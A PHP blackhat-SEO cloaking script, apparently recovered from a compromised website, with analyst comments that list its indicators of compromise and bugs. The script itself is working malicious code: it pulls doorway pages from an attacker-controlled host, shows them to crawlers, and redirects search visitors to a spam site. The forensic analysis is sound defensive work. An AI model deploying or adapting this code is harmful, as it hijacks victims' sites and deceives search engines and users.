黑客作案痕迹 (Traces left by the attacker: the cloaking / doorway script recovered from the compromised site)
<?php
// ---------------------------------------------------------------------------
// NOTE(review): this is a recovered blackhat-SEO "cloaking" (doorway) script,
// reproduced as found so it can serve as a forensic reference. Do NOT deploy
// it. Everything below that is not original code is an analyst annotation.
//
// What the script does (each point is visible in the code below):
//   * fetches doorway HTML from an attacker-controlled server (DESURL),
//     appending the visitor's raw query string;
//   * rewrites links so the page looks hosted on the victim domain (SHELLURL)
//     while stylesheets/icons/images keep loading from DESURL;
//   * serves that HTML only to search-engine crawlers, redirects visitors who
//     arrive from a search engine to nike.hellotobuy.com, and answers everyone
//     else (including the site owner browsing directly) with a bare 404.
//     A 200 for crawler User-Agents but a 404 for the same URL without one is
//     the classic cloaking signal to hunt for.
//
// Indicators of compromise literally present in this file:
//   http://data.hellotobuy.com/nike/5nike5PuXN7/index.php   (content source)
//   http://nike.hellotobuy.com/                             (redirect target)
//   outbound UA "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; ...)"
//   ini_set user_agent "Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
//   Outbound HTTP from the web tier to data.hellotobuy.com is the network IOC.
//
// State as recovered: the `echo ... ;die;` just after `$host` is assigned makes
// every later statement unreachable - right now the file only echoes the
// request's Accept-Language header and exits (a debugging line left in).
// ---------------------------------------------------------------------------

// Remote source of the doorway page. The visitor's QUERY_STRING is appended
// to this URL unvalidated (see the main section); the request goes to the
// attacker's own server, so the exposure is data leakage, not injection here.
define("DESURL","http://data.hellotobuy.com/nike/5nike5PuXN7/index.php");
// Public URL of this script, assembled from request-supplied values.
// NOTE(review): HTTP_HOST and PHP_SELF are client-influenced; below they are
// interpolated into preg patterns without preg_quote() and into the served
// HTML without escaping - a regex metacharacter in the path would make
// preg_replace() fail (return null). Not exploited by this script, just noted.
$shellurl = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];

// Expose the script's own URL as a constant for the rewrite rules.
define("SHELLURL",$shellurl);
$host = $_SERVER['HTTP_HOST'];
//echo $_SERVER['HTTP_USER_AGENT'];die;
// Leftover debug line: prints Accept-Language and terminates the script.
// Nothing after this line executes while it is present.
echo $_SERVER['HTTP_ACCEPT_LANGUAGE'];die;

// Crawler detection by case-insensitive User-Agent substring.
// Returns 1 when any keyword is found, otherwise 0.
// NOTE: every check is a truthy strpos(), so a keyword at offset 0 (a UA that
// *starts* with "bot") is not counted - only matches after the first byte are.
// The author also left a sample desktop-browser UA here as a comment.
function is_spider(){
    $robot = 0;
    //Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 UBrowser/4.0.3647.11 Safari/537.36
    $USER_AGENT = strtolower($_SERVER['HTTP_USER_AGENT']);
    if(strpos($USER_AGENT,"bot")) $robot = 1;
    if(strpos($USER_AGENT,"spider")) $robot = 1;
    if(strpos($USER_AGENT,"slurp")) $robot = 1;
    if(strpos($USER_AGENT,"google")) $robot = 1;
    if(strpos($USER_AGENT,"fast-webcrawler")) $robot = 1;
    if(strpos($USER_AGENT,"altavista")) $robot = 1;
    if(strpos($USER_AGENT,"ia_archiver")) $robot = 1;
    return $robot;
}

// Debug helper: pretty-prints a value inside <pre>. Never called in this file.
function p($arr){
    echo "<pre>";
    print_r($arr);
    echo "</pre>";
}

// Search-engine referral detection by Referer substring.
// Returns 1 when the Referer contains one of the engine names, otherwise 0.
// Same truthy-strpos caveat as is_spider(); "ask" and "aol" are short enough
// to match unrelated referers too (e.g. any URL containing "task").
// A request with no Referer header raises an undefined-index notice here.
function from_se(){
    $fromse = 0;
    $REFERER = $_SERVER["HTTP_REFERER"];
    if(strpos($REFERER,"google")) $fromse = 1;
    if(strpos($REFERER,"yahoo")) $fromse = 1;
    if(strpos($REFERER,"bing")) $fromse = 1;
    if(strpos($REFERER,"aol")) $fromse = 1;
    if(strpos($REFERER,"ask")) $fromse = 1;
    return $fromse;
}

// Check whether the visitor's Accept-Language mentions Chinese ("zh").
// Returns 1 or 0. Unlike the two functions above this one compares against
// false correctly. Its result ($is_zh) is computed but never used below.
function is_lang_zh()
{
    $langs=$_SERVER['HTTP_ACCEPT_LANGUAGE'];
    if(strpos($langs,"zh")!==false)
        return 1;
    else
        return 0;
}

// Fetch $url over HTTP and return the body as a string.
// Three transports are tried in order: cURL, file_get_contents(), raw socket.
// Returns '' if no transport was available; curl_exec()/file_get_contents()
// may also yield false on failure, which is passed straight through.
function GetHttpPage($url) {
    $output = '';
    $time_out = 30;
    if (function_exists ( 'curl_init' )) {
        $ch = curl_init ();
        curl_setopt ( $ch, CURLOPT_URL, $url );
        curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true );
        curl_setopt ( $ch, CURLOPT_BINARYTRANSFER, true );
        // Only a connect timeout is set; there is no overall transfer timeout.
        curl_setopt ( $ch, CURLOPT_CONNECTTIMEOUT, $time_out );
        // Follows redirects from the content server.
        curl_setopt ( $ch, CURLOPT_FOLLOWLOCATION,1);
        // Fixed, outdated browser UA on the outbound request (network IOC).
        curl_setopt ( $ch, CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
        $output = curl_exec ( $ch );
        curl_close ( $ch );
    } elseif (function_exists ( 'file_get_contents' )) {
        // Spoofs a Googlebot UA for the outbound fetch - presumably so the
        // content server only answers crawler-looking clients; cannot confirm.
        // This ini_set persists for the rest of the request.
        ini_set('user_agent', 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)');
        $context = stream_context_create(array('http' => array('timeout' => $time_out)));
        $output = file_get_contents ( $url, false, $context);
    } elseif (ini_get ( "allow_url_fopen" ) == "1") {
        // Raw-socket fallback, reached only when both functions above are
        // unavailable. Port 80 is hard-coded (scheme/port in $url ignored),
        // $info["query"] is read without checking it exists, a connect failure
        // exit()s the whole script, and the returned $output still contains
        // the raw response headers because nothing strips them.
        $errstr = '';
        $errno = '';
        $info = parse_url ( $url );
        $fp = fsockopen ( $info ["host"], 80, $errno, $errstr, $time_out ) or exit ( $errstr . "--->" . $errno );
        $head = "GET " . $info ['path'] . "?" . $info ["query"] . " HTTP/1.1\r\n";
        $head .= "Host: " . $info ['host'] . "\r\n";
        $head .= "Connection: Close\r\n\r\n";
        fwrite($fp, $head);
        while ( ! feof ( $fp ) ) {
            $output .= fgets ( $fp, 128 );
        }
        fclose ( $fp );
    }
    return $output;
}

// ---- main ----------------------------------------------------------------
// Query condition forwarded to the content server, e.g. id=123.
$qstring=$_SERVER["QUERY_STRING"];
$is_zh=is_lang_zh();        // computed, never used
$is_spider = is_spider();
$from_se = from_se();

// Pull the doorway page, passing the visitor's query string through verbatim.
$htmls = GetHttpPage(DESURL . "?" . $qstring);
// The remote template carries a {host} placeholder that is filled with the
// victim's hostname so the page appears native to this site.
$htmls = str_replace("{host}",$host,$htmls);

// Link rewriting, in order:
//  1. href pointing at DESURL            -> SHELLURL
//  2. root-relative href ("/...")        -> SHELLURL + rest (leading "/" dropped)
//  3. any href not starting with "http"  -> SHELLURL + rest
// Only "/" is escaped in $desurlmv (no preg_quote), so "." in DESURL matches
// any byte. Rule 3 references $2 although the pattern has a single group;
// PHP substitutes an empty string for it. The remote template's link format
// (presumably "?param=..." handled by its index.php) is not visible here.
$desurlmv=DESURL;
$desurlmv = str_ireplace('/','\/',$desurlmv);
$htmls=preg_replace('/href\s*=\s*(["\'])'.$desurlmv.'/iU','href=$1'.SHELLURL, $htmls);
$htmls=preg_replace('/href\s*=\s*(["\'])\//iU','href=$1'.SHELLURL, $htmls);
$htmls=preg_replace('/href\s*=\s*(["\'])(?!http)/iU','href=$1'.SHELLURL.'$2', $htmls);

// Undo the rewrite for stylesheets and favicons: "SHELLURL?...css|ico" is
// pointed back at DESURL so those assets still load from the attacker host.
// SHELLURL (client-influenced) is interpolated into the pattern unquoted.
$shellurlmv = SHELLURL;
$shellurlmv = str_ireplace('?','',$shellurlmv);
$shellurlmv = str_ireplace('/','\/',$shellurlmv);
$htmls = preg_replace('/href\s*=\s*(["\'])'.$shellurlmv.'\?(.*\.css)/iU','href=$1'.DESURL.'$2' , $htmls);
$htmls = preg_replace('/href\s*=\s*(["\'])'.$shellurlmv.'\?(.*\.ico)/iU','href=$1'.DESURL.'$2' , $htmls);

// Images/scripts: root-relative and non-http src attributes are rebased on
// DESURL, so media is served by the attacker host, never stored on the victim.
$htmls = preg_replace('/src\s*=\s*(["\'])\//iU','src=$1'.DESURL , $htmls);
$htmls=preg_replace('/src\s*=\s*(["\'])(?!http)/iU','src=$1'.DESURL.'$2', $htmls);

// Drop a dangling "?" immediately before a closing quote, then strip every
// self-closing <input type="hidden" .../> from the fetched HTML (purpose not
// evident from this file).
$htmls=preg_replace('/\?\s*(["\'])/iU','$1', $htmls);
$htmls=preg_replace('/<input\s*type=\s*["\']\s*hidden.*\/\s*>/iU','', $htmls);

// Cloaking dispatch:
//   crawler              -> doorway HTML (unescaped, straight from DESURL)
//   search-engine referer -> Location redirect to the spam site
//   everyone else         -> plain 404, so direct inspection looks harmless
if($is_spider==1)
{
    echo $htmls;
}
else if($from_se==1)
{
    header("Location: http://nike.hellotobuy.com/");
}
else
{
    header('HTTP/1.1 404 Not Found');
    echo '404 Not Found';
}
?>